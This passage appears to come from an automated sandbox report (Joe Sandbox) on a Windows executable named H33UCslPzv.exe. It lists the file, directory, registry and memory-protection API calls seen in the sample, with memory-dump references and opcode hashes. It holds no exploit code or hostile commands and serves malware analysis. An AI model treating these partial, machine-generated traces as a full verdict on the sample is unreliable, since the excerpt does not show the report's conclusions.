                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                  • String ID:
                                                                  • API String ID: 2547128583-0
                                                                  • Opcode ID: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
                                                                  • Instruction ID: 1c2fb029b914f91a359858a8292288339c30c15ea481b8388e8a6490942e710a
                                                                  • Opcode Fuzzy Hash: dd9300423111a071ed2c714751f7876f95e5d132df45129638b184150075da19
                                                                  • Instruction Fuzzy Hash: C3E086326042105BD62156709E0493B62ACDF84700306083EFE47F2240D73CDC31A6A9
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 00405B8A
                                                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BAC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCreate
                                                                  • String ID:
                                                                  • API String ID: 415043291-0
                                                                  • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                  • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                  • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                  • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                  APIs
                                                                  • GetFileAttributesA.KERNELBASE(?,?,00405779,?,?,00000000,0040595C,?,?,?,?), ref: 00405B66
                                                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B7A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                  • Instruction ID: cc84bc49ba1b043e1d2796ac572287907eda555ef0407ac86e19afeaae62c947
                                                                  • Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                  • Instruction Fuzzy Hash: 7FD0C972504425AFC2102728AE0C89BBB65DB542B17028A35FDA5A22B1DB304C569A99
                                                                  APIs
                                                                  • CreateDirectoryA.KERNELBASE(?,00000000,0040323B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 0040565D
                                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040566B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: CreateDirectoryErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1375471231-0
                                                                  • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                  • Instruction ID: c315ded7713b9b4a851445b4695441f34a70141ed77257200a8001455a195bbd
                                                                  • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                  • Instruction Fuzzy Hash: 33C08C30200501DBD6000B308F08F073A51AB80780F01883E608AE00B0CA318055CD2E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: wsprintf
                                                                  • String ID:
                                                                  • API String ID: 2111968516-0
                                                                  • Opcode ID: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
                                                                  • Instruction ID: eb4a75d755b27d484e80f31c5275a4a508bcecdbc7e909d2d8288c975618dcdd
                                                                  • Opcode Fuzzy Hash: a5c5b925e2ad054816d2b1b40947e3624f1beb56d43edc0522ac02e7fcabb176
                                                                  • Instruction Fuzzy Hash: A621C970C0428AAACF219F684A455BFBB709F11314F14447FE891B63D2C1BD8981CB19
                                                                  APIs
                                                                  • MoveFileA.KERNEL32(00000000,00000000), ref: 00401685
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FileMove
                                                                  • String ID:
                                                                  • API String ID: 3562171763-0
                                                                  • Opcode ID: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
                                                                  • Instruction ID: 5e69c691d72f125c1fbeda27f988c68ecdf1fc059cbca8910fb345ac15d52cae
                                                                  • Opcode Fuzzy Hash: 9f9068d1795bd19251473c79ba25bf94ae9e3d59ef929ed5037379c8cd1db445
                                                                  • Instruction Fuzzy Hash: ECF03031604211A7CB11BBBA9F4DD5F2A649F46368B21427FF121B22D2D6BC8902966F
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                                                    • Part of subcall function 00405F4B: wsprintfA.USER32 ref: 00405F58
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointerwsprintf
                                                                  • String ID:
                                                                  • API String ID: 327478801-0
                                                                  • Opcode ID: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
                                                                  • Instruction ID: b182adf31489e09453cd2335cf6310b8baddae2fb6a0e01cc8db6764b629a228
                                                                  • Opcode Fuzzy Hash: 0c79aae5b3eee94086af180aed8bd5da1d19f1ae9c626aedbb9b7459d44442b6
                                                                  • Instruction Fuzzy Hash: 9CE06DB1600215AAD702EBA4AE89CBE776CEB44318F10043BF100F00C1C67D49428A29
                                                                  APIs
                                                                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040239C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringWrite
                                                                  • String ID:
                                                                  • API String ID: 390214022-0
                                                                  • Opcode ID: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
                                                                  • Instruction ID: 00be3bb5cfe09e5788b1f0bae87ec1d7a9c2ea1fc05a431f2d4690520b5a9855
                                                                  • Opcode Fuzzy Hash: 8715e964f7e1e1584f560c66affafa33ab8868ffd84dc36f643b1cff24bf5831
                                                                  • Instruction Fuzzy Hash: FEE04F31A007256BDB213EB25E8ED6F3669AB84744B16113FFA01BA2C2D9BC1C05C26D
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B3,00000000,00792100,000000FF,00792100,000000FF,000000FF,00000004,00000000), ref: 00405C41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                  • Instruction ID: 0d4b5292934197368b0f45fab11a858534e2fa67ffcff62b5ec67f53c8c98dda
                                                                  • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                  • Instruction Fuzzy Hash: 2BE0E632214759ABDF506E959C00AEB776CEB05390F004436F915E2150D631E8519BA4
                                                                  APIs
                                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031FD,00000000,00000000,0040304A,000000FF,00000004,00000000,00000000,00000000), ref: 00405C12
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                  • Instruction ID: 15bd5d27262360345a0b198e16330f5e3575b7202d491c56c7af192eda573772
                                                                  • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                  • Instruction Fuzzy Hash: C8E0EC3261876AABEF109E55AC00AEB7BACEB05760F004836FD15E3190D631E9619BA4
                                                                  APIs
                                                                  • VirtualProtect.KERNELBASE(7002404C,00000004,00000040,7002403C), ref: 7002293F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                  • Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID:
                                                                  • API String ID: 544645111-0
                                                                  • Opcode ID: 5458b32c8c1fe6d3782c044aab96562cf4d033414a5c79c5bbb8585925550d3c
                                                                  • Instruction ID: 009d032cae48bd22e5951d7aba19eea247b768f21cfde36699470d57f031cee3
                                                                  • Opcode Fuzzy Hash: 5458b32c8c1fe6d3782c044aab96562cf4d033414a5c79c5bbb8585925550d3c
                                                                  • Instruction Fuzzy Hash: 3EF0A5B3508280DEE360CF7A9CC4B053FE0A318775B31456AE798D7262E3B440C68F25
                                                                  APIs
                                                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405F01,?,?,?,?,00000002,Call), ref: 00405E97
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: Open
                                                                  • String ID:
                                                                  • API String ID: 71445658-0
                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction ID: 4199424cdd911ade4eb2abdec76784ff09b2342150b3acef81222138bde116dc
                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                  • Instruction Fuzzy Hash: B7D0EC32000609BBDF115F90DD05FAB371DEB08310F004826BE59A4090D6759520AB55
                                                                  APIs
                                                                  • ShowWindow.USER32(0001040A), ref: 00401596
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd
                                                                  Similarity
                                                                  • API ID: ShowWindow
                                                                  • String ID:
                                                                  • API String ID: 1268545403-0
                                                                  • Opcode ID: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
                                                                  • Instruction ID: dd78d0217ab0626d0a7a3bfb5b7a36ba0d54d57a697f982decce5ead7147db90
                                                                  • Opcode Fuzzy Hash: e9cc2bfb6666a38da3f8af72fc6e4fa1e7a90b5ce2f039f92a7749c1dc8846cd
                                                                  • Instruction Fuzzy Hash: 64D0C766704114E7C602D6AD9A4559D639497D5355B304033E102B51E1D1BC460266DF
                                                                  APIs
                                                                  • SendMessageA.USER32(00010404,00000000,00000000,00000000), ref: 004040D9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
